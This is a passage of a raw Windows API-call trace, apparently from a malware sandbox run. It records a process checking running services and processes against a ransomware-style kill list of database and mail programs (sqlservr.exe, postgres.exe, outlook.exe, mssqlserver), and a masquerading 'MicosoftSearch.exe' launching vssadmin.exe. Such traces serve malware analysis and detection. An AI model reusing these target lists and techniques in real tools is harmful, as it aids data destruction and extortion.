lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0045.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0045.502] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0045.502] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0045.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0045.502] lstrlenW (lpString="TrkWks") returned 6 [0045.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0045.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0045.502] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0045.502] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0045.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0045.502] lstrlenW (lpString="UxSms") returned 5 [0045.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0045.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0045.502] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0045.502] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0045.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0045.502] lstrlenW (lpString="VSS") returned 3 [0045.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0045.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0045.502] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0045.502] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0045.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0045.502] lstrlenW (lpString="WdiServiceHost") returned 14 [0045.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0045.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0045.502] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0045.502] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0045.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0045.502] lstrlenW (lpString="WdiSystemHost") returned 13 [0045.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0045.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0045.503] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0045.503] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0045.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0045.503] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0045.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0045.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0045.503] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0045.503] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0045.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0045.503] lstrlenW (lpString="Winmgmt") returned 7 [0045.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0045.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0045.503] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0045.503] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0045.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0045.503] lstrlenW (lpString="WPDBusEnum") returned 10 [0045.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0045.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0045.503] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0045.503] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0045.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0045.503] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba5bf8 | out: hHeap=0xb10000) returned 1 [0045.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b0 [0045.506] Process32FirstW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0045.507] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0045.508] lstrlenW (lpString="System") returned 6 [0045.508] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0045.508] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0045.508] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0045.508] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0045.508] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0045.508] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0045.508] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0045.508] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0045.509] lstrlenW (lpString="smss.exe") returned 8 [0045.509] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0045.509] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0045.509] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0045.509] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0045.509] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0045.509] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0045.509] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0045.509] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.510] lstrlenW (lpString="csrss.exe") returned 9 [0045.510] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0045.510] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0045.510] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0045.510] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0045.510] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0045.510] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0045.510] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0045.510] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0045.510] lstrlenW (lpString="wininit.exe") returned 11 [0045.510] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0045.511] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0045.511] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0045.511] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.511] lstrlenW (lpString="csrss.exe") returned 9 [0045.511] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0045.512] lstrlenW (lpString="winlogon.exe") returned 12 [0045.512] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0045.513] lstrlenW (lpString="services.exe") returned 12 [0045.513] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0045.514] lstrlenW (lpString="lsass.exe") returned 9 [0045.514] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0045.514] lstrlenW (lpString="lsm.exe") returned 7 [0045.514] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.515] lstrlenW (lpString="svchost.exe") returned 11 [0045.515] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.516] lstrlenW (lpString="svchost.exe") returned 11 [0045.516] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.517] lstrlenW (lpString="svchost.exe") returned 11 [0045.517] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.517] lstrlenW (lpString="svchost.exe") returned 11 [0045.517] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.518] lstrlenW (lpString="svchost.exe") returned 11 [0045.518] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0045.519] lstrlenW (lpString="audiodg.exe") returned 11 [0045.519] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.519] lstrlenW (lpString="svchost.exe") returned 11 [0045.520] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.520] lstrlenW (lpString="svchost.exe") returned 11 [0045.520] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0045.521] lstrlenW (lpString="dwm.exe") returned 7 [0045.521] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0045.522] lstrlenW (lpString="explorer.exe") returned 12 [0045.522] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0045.523] lstrlenW (lpString="spoolsv.exe") returned 11 [0045.523] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0045.523] lstrlenW (lpString="taskhost.exe") returned 12 [0045.524] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.524] lstrlenW (lpString="svchost.exe") returned 11 [0045.524] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0045.525] lstrlenW (lpString="taskeng.exe") returned 11 [0045.525] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0045.526] lstrlenW (lpString="taskhost.exe") returned 12 [0045.526] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0045.526] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0045.527] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0045.527] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0045.527] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0045.528] lstrlenW (lpString="sa_shape.exe") returned 12 [0045.528] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0045.529] lstrlenW (lpString="confidence.exe") returned 14 [0045.529] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0045.648] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0045.648] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0045.649] lstrlenW (lpString="blue.exe") returned 8 [0045.649] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0045.650] lstrlenW (lpString="newly debut.exe") returned 15 [0045.650] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0045.650] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0045.650] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0045.651] lstrlenW (lpString="archive.exe") returned 11 [0045.651] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0045.652] lstrlenW (lpString="defend.exe") returned 10 [0045.652] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0045.653] lstrlenW (lpString="arservice.exe") returned 13 [0045.653] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0045.653] lstrlenW (lpString="rr-programmer.exe") returned 17 [0045.653] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0045.654] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0045.654] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0045.655] lstrlenW (lpString="twistedmonton.exe") returned 17 [0045.655] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0045.656] lstrlenW (lpString="arc plains.exe") returned 14 [0045.656] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0045.657] lstrlenW (lpString="americahousestip.exe") returned 20 [0045.657] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0045.657] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0045.657] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0045.658] lstrlenW (lpString="medical lectures.exe") returned 20 [0045.658] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0045.659] lstrlenW (lpString="electronic.exe") returned 14 [0045.659] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0045.660] lstrlenW (lpString="regression.exe") returned 14 [0045.660] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0045.660] lstrlenW (lpString="county.exe") returned 10 [0045.660] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0045.661] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0045.661] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0045.662] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0045.662] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0045.663] lstrlenW (lpString="cmd.exe") returned 7 [0045.663] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0045.664] lstrlenW (lpString="conhost.exe") returned 11 [0045.664] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0045.664] lstrlenW (lpString="vssadmin.exe") returned 12 [0045.664] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0045.665] lstrlenW (lpString="VSSVC.exe") returned 9 [0045.665] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.666] lstrlenW (lpString="svchost.exe") returned 11 [0045.666] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0045.667] CloseHandle (hObject=0x1b0) returned 1 [0045.667] Sleep (dwMilliseconds=0x1f4) [0046.393] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 